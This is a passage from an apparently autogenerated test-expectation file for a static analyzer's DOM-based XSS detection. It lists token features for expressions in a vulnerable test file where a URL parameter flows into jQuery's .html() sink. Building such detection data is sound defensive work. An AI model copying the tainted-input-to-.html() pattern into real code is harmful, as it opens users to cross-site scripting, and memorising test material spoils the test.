enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | $('name') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | $('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | $('name') | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | exceptional return of $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | exceptional return of $('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | exceptional return of $('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | exceptional return of $('name') | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:11 | exceptional return of $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:16 | $('name').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:16 | $('name').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:16 | $('name').html | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:16 | $('name').html | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:16 | $('name').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | $('name ... name')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | $('name ... name')) | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | $('name ... name')) | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | $('name ... name')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | exceptional return of $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | exceptional return of $('name ... name')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | exceptional return of $('name ... name')) | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | exceptional return of $('name ... name')) | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:36 | exceptional return of $('name ... name')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17247,6 +119871,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:332:5:332:10 | 'name' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:13:332:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:13:332:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:13:332:16 | html | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:13:332:16 | html | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:13:332:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:23 | params | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:23 | params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:23 | params | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:23 | params | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:23 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:27 | params.get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:27 | params.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:27 | params.get | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:27 | params.get | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:27 | params.get | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | exceptional return of params.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | exceptional return of params.get('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | exceptional return of params.get('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | exceptional return of params.get('name') | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | exceptional return of params.get('name') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17254,6 +119898,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:332:18:332:35 | params.get('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:25:332:27 | get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:25:332:27 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:25:332:27 | get | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:25:332:27 | get | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:332:25:332:27 | get | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | CalleeFlexibleAccessPath | params.get | | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17262,6 +119911,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | enclosingFunctionName | URLPseudoProperties | | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:332:29:332:34 | 'name' | receiverName | params | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:11 | myUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:11 | myUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:11 | myUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:11 | myUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:11 | myUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl = ... edUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl = ... edUrl() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl = ... edUrl() | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl = ... edUrl() | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:7:334:29 | myUrl = ... edUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:27 | getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:27 | getTaintedUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:27 | getTaintedUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:27 | getTaintedUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:27 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | exceptional return of getTaintedUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | exceptional return of getTaintedUrl() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | exceptional return of getTaintedUrl() | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | exceptional return of getTaintedUrl() | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | exceptional return of getTaintedUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | getTaintedUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | getTaintedUrl() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | getTaintedUrl() | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | getTaintedUrl() | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:334:15:334:29 | getTaintedUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:3 | $ | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:3 | $ | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | $('name') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | $('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | $('name') | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | exceptional return of $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | exceptional return of $('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | exceptional return of $('name') | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:335:3:335:11 | exceptional return of $('name') | enclosingFunctionName | URLPseudoProperties | +| 